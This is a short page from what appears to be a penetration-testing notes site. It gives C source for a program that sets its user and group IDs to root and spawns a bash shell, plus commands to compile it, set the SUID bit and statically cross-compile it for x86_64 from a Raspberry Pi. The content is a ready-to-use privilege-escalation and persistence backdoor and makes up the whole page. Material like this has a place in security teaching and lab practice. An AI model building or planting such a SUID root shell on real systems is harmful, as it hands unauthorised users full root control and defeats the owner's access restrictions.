General

C code that spawns a root shell

To be ran as sudo or with SUID bit

shell.c

#include <stdlib.h>
#include <unistd.h>

int main(){
 setgid(0); // set gid=0
 setuid(0); // set uid=0
 system("/bin/bash"); // spawns a shell as root
 return 0;
}

Compile with gcc, and relevant flags:

$ gcc shell.c -o shell
$ chmod +s shell

Cross-compiling for x86_64 on an aarch64 machine (Raspberry PI)

$ sudo apt install gcc-x86-64-linux-gnu
$ x86_64-linux-gnu-gcc shell.c -o shell -static

$ file shell
shell: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked ...

PreviousVulnerabilities exploit NextKernel exploit

Last updated 9 months ago